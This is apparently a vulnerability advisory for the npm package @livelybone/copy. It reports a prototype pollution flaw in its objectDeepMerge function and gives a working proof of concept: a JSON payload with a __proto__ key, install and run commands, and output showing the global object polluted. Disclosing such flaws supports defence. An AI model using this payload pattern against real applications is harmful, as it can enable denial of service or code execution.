@livelybone/copy
is vulnerable to Prototype Pollution
.
This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE.
// poc.js
var copy = require("@livelybone/copy")
const payload = JSON.parse('{"__proto__":{"polluted":"Yes! Its Polluted"}}');
var obj = {}
console.log("Before : " + {}.polluted);
copy.objectDeepMerge(obj, payload);
console.log("After : " + {}.polluted);
npm i @livelybone/copy # Install affected module
node poc.js # Run the PoC
Before : undefined
After : Yes! Its Polluted